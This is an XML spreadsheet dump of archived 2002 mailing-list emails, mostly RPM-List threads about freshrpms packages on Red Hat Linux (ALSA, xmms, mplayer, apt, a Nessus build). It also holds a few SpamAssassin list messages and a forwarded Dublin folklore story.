Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.17 0.17 0.12_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I've put up a new Red Hat Linux 8.0 build of nessus here :
http://ftp.freshrpms.net/pub/freshrpms/testing/nessus/It's 100% untested, although the build should be ok. The new menu was
added, but some configuration files may be better with new or different
defaults.Feedback is very welcome!Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.06 0.12 0.17_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">humberto@hpcf.upr.edu wrote:&gt;Redhat 8 disables all support for .mp3 files, relinking xmms with a zzmp3 
&gt;module. Does anyone have a fixed spec file for xmms? One that can play mp3's 
&gt;would be best.
&gt;
&gt;  
&gt;
oh xmms didn't work for me also
i used mpg123 i tought its something from me
like mplayer not working also and gives black screen
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:&gt;Once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&gt;mplayer works with dga (if i am root) and works with x11
and always worked with sdl (but not now with redhat 8)
now it gives black screen window and play the music of the movie.Roi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :&gt; mplayer works with dga (if i am root) and works with x11
&gt; and always worked with sdl (but not now with redhat 8)
&gt; now it gives black screen window and play the music of the movie.Strange, because as I said in an earlier post, it works for me. Maybe
you're missing the SDL_image or something? :-/Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.28 0.17 0.13_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t>Once upon a time, Joshua wrote :&gt; Just a thought, would it be possible to generalize this ALSA 
&gt; stuff to make building a kernel with *any* custom/optional/updated
&gt; modules an easy thing? I think some scripts or at least step-by-step
&gt; instructions would be great. 
&gt; 
&gt; For example, to build a kernel RPM with ALSA do:
&gt; 1. get the kernel source
&gt; 2. get the ALSA source
&gt; 3. run the custom-kernel.sh script
&gt; ...
&gt; 
&gt; Or a kernel RPM with the lastest wireless LAN drivers:
&gt; 1. get the kernel source
&gt; 2. get the CVS driver source
&gt; 3. run the custom-kernel.sh script
&gt; ...
&gt; 
&gt; etc.This wouldn't be worth the effort involved IMHO, and would probably end up
in relative breakage of a few systems if not carefully tested.
Your first example is a good one, because I really think it's even easier
currently :
1. Leave your current kernel as-is
2. Get the "alsa-driver" source rpm
3. Rebuild and install resulting packagesDrivers that are written to be easily compiled as modules (like ltmodem,
NVidia, ALSA etc.) can easily be repackaged separately as rpms and ported
as easily for various kernel rpms from the source rpm.Also, what you describe is sort of the opposite of what rpm packaging is in
my mind. I see it more as a "one size fits all" achievement in the general
case. And kernel isn't an exception (although there are packages optimized
for various processors) since they all come with just about all the modules
you'll ever need. Make that "one size fits many" then if you want ;-)Last but not least : The kernel is something I'm trying to keep away from
in my packaging since I really don't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mess.MatthiasPS: Yes Chris, I'm worried about not giving you too much work! Less in fact
since you can easily answer "freshrpms.net!" to people asking how to play
DVDs, right? ;-))))--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</si>
  <si>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Thanks Matthias.  Actually I got all four speakers with subwoofer
working in digital out mode with gamixer.
(http://www1.tcnet.ne.jp/fmurata/linux/down/)However switching between analog and digital, I'm still baffled.  As I
have a tuner and cassette deck hooked up to "Line In" on a SBLive! 5.1,
which is in analog mode.  But digital out works great now!On Wed, 2002-08-28 at 23:26, Matthias Saou wrote:
&gt; Once upon a time, Lance wrote :
&gt; 
&gt; &gt; Ok, I got ALSA installed and there is no static inbetween mp3s like
&gt; &gt; before which is great!  My setup is digital 4.1 but sound is only coming
&gt; &gt; from front 2 speakers and subwoofer, rear speakers there is no sound. 
&gt; &gt; Also alsamixer or aumix are unresponsive as well. 
&gt; 
&gt; Maybe you could find more info or tips on the ALSA page for your card?
&gt; Also, you could try "alsactl store", editing /etc/asound.state" by hand
&gt; (for me it contains data similar to what I can control with "alsamixer")
&gt; then run "alsactl restore" and see if you're able to change what you want
&gt; that way.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</si>
  <si>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I want to thank those involved in making these RPMS available.  Thanks
guys, thanks Matthias.LanceOn Thu, 2002-08-29 at 14:30, Lance wrote:
&gt; Thanks Matthias.  Actually I got all four speakers with subwoofer
&gt; working in digital out mode with gamixer.
&gt; (http://www1.tcnet.ne.jp/fmurata/linux/down/)
&gt; 
&gt; However switching between analog and digital, I'm still baffled.  As I
&gt; have a tuner and cassette deck hooked up to "Line In" on a SBLive! 5.1,
&gt; which is in analog mode.  But digital out works great now!
&gt; 
&gt; On Wed, 2002-08-28 at 23:26, Matthias Saou wrote:
&gt; &gt; Once upon a time, Lance wrote :
&gt; &gt; 
&gt; &gt; &gt; Ok, I got ALSA installed and there is no static inbetween mp3s like
&gt; &gt; &gt; before which is great!  My setup is digital 4.1 but sound is only coming
&gt; &gt; &gt; from front 2 speakers and subwoofer, rear speakers there is no sound. 
&gt; &gt; &gt; Also alsamixer or aumix are unresponsive as well. 
&gt; &gt; 
&gt; &gt; Maybe you could find more info or tips on the ALSA page for your card?
&gt; &gt; Also, you could try "alsactl store", editing /etc/asound.state" by hand
&gt; &gt; (for me it contains data similar to what I can control with "alsamixer")
&gt; &gt; then run "alsactl restore" and see if you're able to change what you want
&gt; &gt; that way.
&gt; &gt; 
&gt; &gt; Matthias
&gt; &gt; 
&gt; &gt; -- 
&gt; &gt; Matthias Saou                                World Trade Center
&gt; &gt; -------------                                Edificio Norte 4 Planta
&gt; &gt; System and Network Engineer                  08039 Barcelona, Spain
&gt; &gt; Electronic Group Interactive                 Phone : +34 936 00 23 23
&gt; &gt; 
&gt; &gt; _______________________________________________
&gt; &gt; RPM-List mailing list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</si>
  <si>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On 14:22 29 Aug 2002, Matthias Saou  wrote:
| Once upon a time, Axel wrote :
| &gt; I am now relaxed again ;), and pass this info on. Probably Matthias Saou
| &gt; himself is "dude", and some package has hardwired a path in his build
| &gt; directory. It would be nice to find out which and fix it, but I am using
| &gt; too many of the freshrpm suite to narrow it down.
| 
| Indeed, my usual login is "dude" (and has been since long before "The Big
| Lebowsky" came out ;-)), and it seems the some programs wrongly hard code
| my home directory when being compiled :-(
| For instance :
| 
| [dude@python dude]$ strings /usr/bin/gentoo | grep dude
| /home/dude/
| [dude@python dude]$ strings /usr/bin/xine | grep dude
| /home/dude/redhat/tmp/xine-root/usr/share/locale
| 
| These should probably be considered bugs in the program's build process
| (especially for xine, look at that!), I'll report them upstream if/when I
| have some time.This is a standard trap for people building things from source. It's
generally wise to have a special "build" environment to avoid these
hassles. Most likely you have some library loading path in your env. An
strace of the app will show it:	the-app 2&gt;&amp;1 | grep dudePersonally, I have a script called logbuild whose entire purpose is to
start a shell with a minimal build environment, logged with script. The
prevents this kind of error. Since configure yanks all sorts of ill
documented values from one's environment for use in the build (CC, ARCH,
various LD_* variables) this kind of thing is necessary.Often the easiest thing is to have a special nonroot account with no .profile
for building stuff.Cheers,
-- 
Cameron Simpson, DoD#743        cs@zip.com.au    http://www.zip.com.au/~cs/Do not taunt Happy Fun Coder._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>I know this is simple but do you have /usr/src/linux and
/usr/src/linux-2.4 symlinked to your kernel source directory?  Also is
there a .config in /usr/src/yourkernelsource/.config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&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
-- 
:
####[ Linux One Stanza Tip (LOST) ]###########################Sub : Finding out files larger than given size       LOST #324To find out all files in a dir over a given size, try:
find /path/to/dir_of_file -type f -size +Nk
[Where N is a number like 1024 for 1mb, and multiples thereof] ####[Discussions on LIH : 04 Jul 2002]########################
:
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Sat, 2002-08-31 at 08:28, Ben Liblit wrote:&gt; Well, I've figured out the problem.  I guess you could say it's an ALSA 
&gt; bug.  When one configures using "--with-cards=all", ALSA blindly turns 
&gt; on the various CONFIG_SND_USB_* macros even if CONFIG_USB is not 
&gt; actually set.
[...]
&gt; Matthias, would you please consider hooking up this patch in your 
&gt; alsa-driver.spec?  It can be added in the obvious manner:
&gt; 
&gt; I suppose I should send this along to the ALSA developers as well.  For 
&gt; them I'll produce a "proper" patch that makes the fix in "acinclude.m4". 
&gt;   Or is someone else on this list already part of the ALSA developer 
&gt; community, and willing to shepherd this through for me?Not me, but IMHO it's kind of offtopic to put it in freshrpms.net RPMs. 
Upstream is the way to go...-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Ville wrote :&gt; Not me, but IMHO it's kind of offtopic to put it in freshrpms.net RPMs. 
&gt; Upstream is the way to go...Agreed, especially since my packages are primarily meant for the original
Red Hat Linux kernels. And someone removing USB support from his kernel is
probably not going to recompile ALSA with *all* the drivers anyway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</si>
  <si>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This mixer is specific to ALSA's special stuff, I use it in addition to the other
mixers if I need something special.I built it a while ago, may need a --rebuild.http://www.dudex.net/rpms/gamix-1.99.p13-aap1.i686.rpm
http://www.dudex.net/rpms/gamix-1.99.p13-aap1.src.rpm
http://www.dudex.net/rpms/gamix.specMatthias Saou (matthias@egwn.net) wrote*:
&gt;
&gt;Once upon a time, Ville wrote :
&gt;
&gt;&gt; Ah!  The mixer stuff was what made me look for an init script in the
&gt;&gt; first place, I didn't bother to check whether the existing stuff would
&gt;&gt; have worked with that.  Will try that out, you can assume silence ==
&gt;&gt; success :)
&gt;
&gt;Well, from what I've tried, both the main and the PCM (at least) volume
&gt;levels can be controlled either by "alsamixer" or the good old "aumix".
&gt;
&gt;&gt; &gt; &gt;From what I can tell after only 2 days using it : ALSA rocks,
&gt;&gt; &gt; &gt;especially
&gt;&gt; &gt; since having a full OSS compatibility results that it breaks nothing at
&gt;&gt; &gt; all! :-)
&gt;&gt;
&gt;&gt; Agreed.  Though with only 2 hours experience...
&gt;
&gt;I guess/hope some other people from the list will try it out ;-)
&gt;
&gt;Both problems you reported (libasound.so and wrong xine dependency) are now
&gt;fixed in the current packages.
&gt;
&gt;Oh, it's maybe also worth pointing out : I've implemented at last sorting
&gt;by both last change date and alphabetically for my "build list" in the php
&gt;code : http://freshrpms.net/builds/
&gt;
&gt;And yes, I accept patches/comments/suggestions about all those spec files!
&gt;
&gt;Matthias
&gt;
&gt;
&gt;_______________________________________________
&gt;RPM-List mailing list 
&gt;--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-10-08 at 00:05, Matthias Saou wrote:&gt; It's 100% untested, although the build should be ok. The new menu was
&gt; added, but some configuration files may be better with new or different
&gt; defaults.
&gt; 
&gt; Feedback is very welcome!Looks good to me, just installed it, and ran a local scan, everything
worked smoothly.  Thanks a bunch!-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :&gt; RPM build errors:
&gt;     user dude does not exist - using root
&gt;     user dude does not exist - using root
&gt;     user dude does not exist - using root
&gt;     user dude does not exist - using root
&gt;     user dude does not exist - using rootThis I would guess is normal, but don't you get it at the very beginning of
the build? Isn't this at the end just a reminder?&gt;     File not found: /var/tmp/xine-root/usr/bin/aaxineArgh, I forgot to exclude aaxine from the %files when using "--without
aalib" :-(
The current "fr6.1" spec file fixes this...Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.02 0.03 0.00_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :&gt; oh xmms didn't work for me also
&gt; i used mpg123 i tought its something from meNope, this is "normal" as Red Hat removed all mp3 support from 8.0 because
of patent and royalty issues :-(
On freshrpms.net, you can find the xmms mp3 plugin as I said, but also
libmad, lame (mp3 encoder), and soon mpg321 as I often used it myself.
Many other players can also play mp3 files, like alsaplayer, xine, mplayer.&gt; like mplayer not working also and gives black screenThis is not normal though...
Try "mplayer -vo help" then try usinf various output methods to see if some
do work or not.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.00 0.05 0.01_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002, Thomas Vander Stichele wrote:&gt;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anyway.That's just apt's way of telling you the package is in "AllowDuplicated", 
meaning multiple versions of the package can be installed at the same 
time. Yes the output is a bit strange.. especially when there's only one 
version available.'apt-get install kernel-source#2.4.18-3' will install it...-- 
	- Panu -
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002, Jesse Keating wrote:&gt; On Mon, 7 Oct 2002 19:28:51 +0200
&gt; Matthias Saou  wrote:
&gt; 
&gt; # I've never heard of any CD-ROM or DVD-ROM drive having problems with
&gt; # DMA... although there probably is since Red Hat decided to default
&gt; # disabling it a few releases back :-/
&gt; 
&gt; When I worked as a PC repair tech for a Computer store chain, I did
&gt; run across quite a few DVD drives that would lock up if DMA was
&gt; enabled.  It's more of a chipset/drive problem than a Drive by itself.And my IBM Intellistation would lock up instantly .. now this is actually 
quite funny .. if DMA was enabled for the CD-ROM *and* you tried to access 
a CD with Joliet extensions. Otherwise it worked just fine with DMA 
enabled :)-- 
	- Panu -
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t>Matthias Saou (matthias@rpmforge.net) wrote*:
&gt;
&gt;You can also install the XMMS plugin
&gt;(seems to make my XMMS segfault on exit...
&gt;hmmm, but maybe it's another plugin) to listen to your good ol' mp3
&gt;files... that's it!I've an XMMS Alsa module I've been using for a while now at:
http://www.dudex.net/rpms/alsa-xmms-0.9_cvs020630-aap1.i686.rpm
http://www.dudex.net/rpms/alsa-xmms-0.9_cvs020630-aap1.src.rpm
http://www.dudex.net/rpms/alsa-xmms-0.9_cvs020630.specAlso there is alsaplayer rpms there too:
http://www.dudex.net/rpms/alsaplayer-0.99.71-aap1.i386.rpm
http://www.dudex.net/rpms/alsaplayer-0.99.71-aap1.i686.rpm
http://www.dudex.net/rpms/alsaplayer-0.99.71-aap1.src.rpm
http://www.dudex.net/rpms/alsaplayer-0.99.71.specGood luck. Both were build on an RH 7.3 box with errata current as of the date of
the build. I'm running (null) RH beta now and I recall that alsa-xmms still works, I
can not remember if alsaplayer needs a --rebuild.As an aside, alsaplayer is really maturing into a versitile app, I've been packaging
for many releases now.I've scripted the alsa-xmms cvs build, so it's easy to spin another one if these
rpms do not work on (null).--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t xml:space="preserve">After installing and enabling xosd-xmms I get the following error when
trying to start xmmsXlib: unexpected async reply (sequence 0x30)!xmms starts, but it does not detect mouse commands.Thanks,
Mike
-- 
D. Michael Basinger
dbasinge@speakeasy.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Jon wrote :&gt; Since libdvdcss-1.2.0, I have been unable to play DVDs using ogle, xine,
&gt; vlc, or mplayer.  They all show a scrambled picture with (VERY) choppy
&gt; audio.  When I run xine I see tons of these in the console: 
&gt; 
&gt; liba52: a52_block error
&gt; liba52: a52_block error
&gt; liba52: a52_block error
&gt; liba52: a52_block error
&gt; audio_out: inserting 5859 0-frames to fill a gap of 10989 pts
&gt; metronom: audio jump
&gt; liba52: a52_block error
&gt; 
&gt; Has anyone seen this before and know how to fix it?  Or should I file a
&gt; bug report?  Hi,First of all, sorry for not replying to your private email from last week,
but I really don't have a slight idea of what could be causing this!
- Is this with different DVDs or a single one?
- Is this using OSS or ALSA? Have you tried both?
- Is this using binariy packages or recompiling source ones?I remember a user having trouble with a particular DVD ever since upgrading
libdvdcss to a recent version, but haven't heard the end of the story.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.07 0.20 0.21_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
I've also just tried doing rpm --rebuilddb, no change.A question:Do these files look too small?  root@canarsie:/var/cache/apt # ls -ltr
total 148
drwxr-xr-x    2 root     root         4096 Sep 29 10:49 gensrclist
drwxr-xr-x    2 root     root         4096 Sep 29 10:49 genpkglist
drwxr-xr-x    3 root     root         4096 Oct  8 19:59 archives
-rw-r--r--    1 root     root        49863 Oct  9 15:25 srcpkgcache.bin
-rw-r--r--    1 root     root       158131 Oct  9 15:25 pkgcache.bin
I ran strings on them, and it doesn't look like I see a complete listing
of either my system's installed RPMs, or the rpms in the lists:root@canarsie:/var/state/apt/lists # ls -s
total 9988
 416 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.freshrpms
8704 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.os
   0 apt.freshrpms.net_redhat_8.0_en_i386_base_pkglist.updates
   4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.freshrpms
   4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.os
   4 apt.freshrpms.net_redhat_8.0_en_i386_base_release.updates
  64 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.freshrpms
 788 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.os
   0 apt.freshrpms.net_redhat_8.0_en_i386_base_srclist.updates
   0 lock
   4 partial
If I kill them, they get recreated about the same size next time I run
apt-get..-SteveK
On Tue, Oct 08, 2002 at 08:01:48PM -0400, Steve Kann wrote:
&gt; 
&gt; I posted about this last week, and I'm still stumped.  apt-get is just
&gt; not working for me, and I can't figure out what the problem is.
&gt; 
&gt; I've tried removing the apt rpms, making sure to remove any traces left
&gt; behind (/etc/apt /var/state/apt /var/cache/apt), and still, I get
&gt; "couldn't find package xmms-mp3" when running "apt-get install xmms-mp3".
&gt; 
&gt; Any clues?  Here's a log of a fresh try:
&gt; 
&gt; root@canarsie:/tmp # rpm -e apt apt-devel
&gt; root@canarsie:/tmp # rm -rf /etc/apt /var/cache/apt /var/state/apt
&gt; root@canarsie:/tmp # rpm -ivh apt-0.5.4cnc7-fr1.i386.rpm apt-devel-0.5.4cnc7-fr1.i386.rpm
&gt; warning: apt-0.5.4cnc7-fr1.i386.rpm: V3 DSA signature: NOKEY, key ID
&gt; e42d547b
&gt; Preparing...                ########################################### [100%]
&gt;    1:apt                    ########################################### [ 50%]
&gt;    2:apt-devel              ########################################### [100%]
&gt; root@canarsie:/tmp # apt-get update
&gt; Ign http://apt.freshrpms.net redhat/8.0/en/i386 release
&gt; Get:1 http://apt.freshrpms.net redhat/8.0/en/i386/os pkglist [1276kB]
&gt; Get:2 http://apt.freshrpms.net redhat/8.0/en/i386/os release [108B]
&gt; Get:3 http://apt.freshrpms.net redhat/8.0/en/i386/updates pkglist [14B]
&gt; Get:4 http://apt.freshrpms.net redhat/8.0/en/i386/updates release [113B]
&gt; Get:5 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms pkglist
&gt; [57.1kB]
&gt; Get:6 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms release
&gt; [125B]
&gt; Get:7 http://apt.freshrpms.net redhat/8.0/en/i386/os srclist [152kB]
&gt; Get:8 http://apt.freshrpms.net redhat/8.0/en/i386/updates srclist [14B]
&gt; Get:9 http://apt.freshrpms.net redhat/8.0/en/i386/freshrpms srclist
&gt; [14.4kB]
&gt; Fetched 1500kB in 11s (125kB/s)
&gt; Reading Package Lists... Done
&gt; root@canarsie:/tmp # apt-get install xmms-mp3
&gt; Reading Package Lists... Done
&gt; Building Dependency Tree... Done
&gt; E: Couldn't find package xmms-mp3
&gt; root@canarsie:/tmp # apt-cache search xmms
&gt; root@canarsie:/tmp #
&gt; 
&gt; 
&gt; Beats me..
&gt; 
&gt; -SteveK
&gt; 
&gt; 
&gt; 
&gt; -- 
&gt;   Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
&gt;                 HorizonLive.com - collaborate . interact . learn
&gt;    "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."-- 
  Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
                HorizonLive.com - collaborate . interact . learn
   "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Should I expect problems if my apt server is running RH 7.3/Apt 0.3 and
some clients are coming on line and will be running RH 8.0/Apt 0.5? Do
the two different version interoperate?Thanks,tjb
-- 
=======================================================================
| Thomas Baker                                  email: tjb@unh.edu    |
| Systems Programmer                                                  |
| Research Computing Center                     voice: (603) 862-4490 |
| University of New Hampshire                     fax: (603) 862-1761 |
| 332 Morse Hall                                                      |
| Durham, NH 03824 USA              http://wintermute.sr.unh.edu/~tjb |
=======================================================================_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Thomas wrote :&gt; Should I expect problems if my apt server is running RH 7.3/Apt 0.3 and
&gt; some clients are coming on line and will be running RH 8.0/Apt 0.5? Do
&gt; the two different version interoperate?No problems whatsoever. Currently apt.freshrpms.net is running 7.3 with apt
0.3 and many 8.0 clients with 0.5 are using it.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.10 0.11 0.10, AC on-line, battery charging: 100% (1:47)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,Has anyone made a working source RPM for dvd::rip for Red Hat 8.0?
Matthias has a spec file on the site for 0.46, and there are a couple of
spec files lying around on the dvd::rip website, including one I patched
a while ago, but it appears that the Makefile automatically generated is
trying to install the Perl libraries into the system's, and also at the
moment dvd::rip needs to be called with PERLIO=stdio as it seems to not
work with PerlIO on RH8's Perl.Not too sure what the cleanest way to fix this is - anyone working on
this?Thanks,-- 
MichÃ¨l Alexandre Salim
Web:		http://salimma.freeshell.org
GPG/PGP key:	http://salimma.freeshell.org/files/crypto/publickey.asc__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, MichÃ¨l wrote :&gt; Has anyone made a working source RPM for dvd::rip for Red Hat 8.0?I don't think I've tried yet, but if I did, I probably moved on to another
package after having bumped into one of the problems you mention.If anyone sends me a patch to my spec file and eventually needed patches
etc., I'd be more than glad to make a new build available.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.13 0.09 0.09_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t>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money.BlogEnd: 
LinkText: Billy in the BowlFrom:         daev 
Subject:      The Case of the Stoneybatter StranglerA story of my new neighbourhood...
The Irish Digest July 1964
The Case of the Stoneybatter StranglerThe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Bowl"The strange appellation was derived from the fact that Billy's sole means
of transport was a large bowl-shaped car with wheels.  Seated in this "
bowl ", the beggar would propel himself along by pushing against the ground
with wooden plugs, one in each hand.Billy's unusual means of conveyance was vitally necessary, as he had been
born without legs.  Nature, however, had compensated for this by endowing
him with powerful arms and shoulders and, what was most important, an
unusually handsome face.This was Billy's greatest asset in his daily routine of separating
sympathetic passers-by from their small change.The cunning young beggar would wait at a convenient spot on one of the many
lonely roads or lanes which were a feature of eighteenth century
Grangegorman and Stoneybatter, until a servant girl or an old lady would
come along.He would then put on is most attractive smile which, together with his
black curly hair, never failed to halt the females.  The fact that such a
handsome young man was so terribly handicapped physically always evoked pity."Billy in the Bowl", however, wasn't satisfied with becoming the daily
owner of a generous number of small coins; what his greed demanded were
substantial sums of money.  The more he managed to get the more he could
indulge in his pet vices - gambling and drinking.As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Quays.When Billy heard the woman's footsteps, he hid behind some bushes in a
ditch which skirted the lane.  As his unsuspecting victim drew close, the
beggar moaned and shouted, and cried out for help.Trembling with excitement, the woman dashed to the spot where Billy lay
concealed.  She bent down to help the beggar out of the ditch, when two
powerful arms closed around her throat and pulled her into the bushes.In a few minutes it was all over.  The woman lay in a dead faint, and Billy
was travelling at a fast rate down the lane in his " bowl ", his victirn's
purse snug in his coat pocket.  An hour after the robbery the woman was
found in a distracted condition, but failed to give a description of her
assailant.  And, as "Billy in the Bowl" had figured, nobody would suspect a
deformed beggar.Again and again the beggar carried out his robbery plan, always shifting
the place of attack to a different part of Grangegorman or  Stoneybatter.On one occasion " Billy in "the Bowl " tried his tactics on a sturdy
servant girl who put up such a vigorous resistance that he was forced to
strangle her.  The incident became known as the 11 Grangegorman Lane Murder
and caused a great stir.Hundred.s flocked to the scene of the crime and for a couple of months
"Billy in the Bowl" was forced to desert his usual haunts.  Around this
period, Dublin's first-ever police force was been mobilised, and the first
case they were confronted with was the Grangegorman lane murder.Months passed and  "Billy in the Bowl" reverted once again to his old
pasttime.  A number of young servant girls were lured into ditches and
robbed, and the police were inundated with so many complaints that a
nightly patrol was placed on the district.  But the beggar still rolled
along in his "bowl" pitied and unsuspected.  Then came the night that
finished Billy's career of crime.Two stoudy built female cooks, trudging back to their places of employment
after a night out in the city, were surprised and not a little shocked to
hear shouts for help.  Rushing over, they came upon a huddled figure in the
ditch.Billy, thinking there was only one woman, grabbed one of the cooks and
tried to pull her into the ditch.  She proved much too strong for him,
however) and while resisting tore 'at his face with her sharp finger-nails.Meanwhile, her companion acted with speed and daring.  Pulling out her
large hatpin she made .for the beggar, and plunged the pin into his right eye.The screams and howls of the wounded beggar reverberated throughout the
district and brought people dashing to the scene.  Among them was a member
of the nightly police patrol who promptly arrested the groaning Billy."Billy in the Bowl" was tried and sentenced for robbery with violence, but
they could never prove it was he who had strangled the servant girl.  The
Grangegorman-Stoneybatter district became once again a quiet, attractive
Dublin suburb where old ladies strolled, and carefree servant girls laughed
and giggled as they wended their way home at night.daev_______________________________
Rev.  Dave 'daev' Walsh, daev@fringeware.com
Home:  http://www.fringeware.com/hell
Weekly Rant: http://www.nua.ie/blather
'Is it about a bicycle?'-Sgt.Pluck, 
'The Third Policeman', by Flann O'Brien
________________________________
Holistic Pet Detective, Owl Worrier, Snark Hunter 
________________________________</t>
  </si>
  <si>
    <t xml:space="preserve">I never claimed it could learn *all* combinatorial 
possibilities, but it certainly can learn some.COn Thursday, August 22, 2002, at 07:21  PM, Scott A Crosby wrote:&gt; On Thu, 22 Aug 2002 09:20:05 -0700, Craig R.Hughes 
&gt;  writes:
&gt;
&gt;&gt; It *can* learn combinatorial stuff in a more subtle way.  Imagine
&gt;
&gt; No it can't..
&gt;
&gt; It can learn a few examples that happen to be linearily seperable,
&gt; like those you gave. It cannot learn the example I gave below, which
&gt; is not linearily seperable.
</t>
  </si>
  <si>
    <t>Hello all,
I get problems with the latest nightly build from Spamassassin with
VMailMgr + OMail-Admin. 
It scans the mail and gives it an :        X-Spam-Status: No, hits=11.4 required=7.0Can someone look at the code for it? Maybe because option -F is gone?
Greetings
Erik Rudolfs-------------------------------------------------------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</si>
  <si>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
"Craig R.Hughes" said:&gt; Are you filtering the nonspamtrap for spam when those 
&gt; newsletters sold your address to someone you didn't sign up 
&gt; with?  You should probably manually verify that all the mail in 
&gt; the trap is in fact nonspam!Yep.  so far it's all opt-in stuff, no "affiliate deals" etc.--j.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</si>
  <si>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Like an alias for each list that points to the nonspamtrap address.J
At 10:50 AM -0700 8/22/02, Craig R.Hughes wrote:
&gt;Are you filtering the nonspamtrap for spam when those newsletters 
&gt;sold your address to someone you didn't sign up with?  You should 
&gt;probably manually verify that all the mail in the trap is in fact 
&gt;nonspam!
&gt;
&gt;C
&gt;
&gt;On Thursday, August 22, 2002, at 07:59  AM, Justin Mason wrote:
&gt;
&gt;&gt;
&gt;&gt;Justin Shore said:
&gt;&gt;
&gt;&gt;&gt;I just ran across a false positive that scored 8.6.  The message was
&gt;&gt;&gt;a solicited ad from Apple.com on educator deals.  I can send a copy
&gt;&gt;&gt;if anyone wants it.
&gt;&gt;
&gt;&gt;Yes, please do send it on, and I'll add it to the non-spam corpus.
&gt;&gt;
&gt;&gt;To date, the scores evolved by SpamAssassin are very biased towards
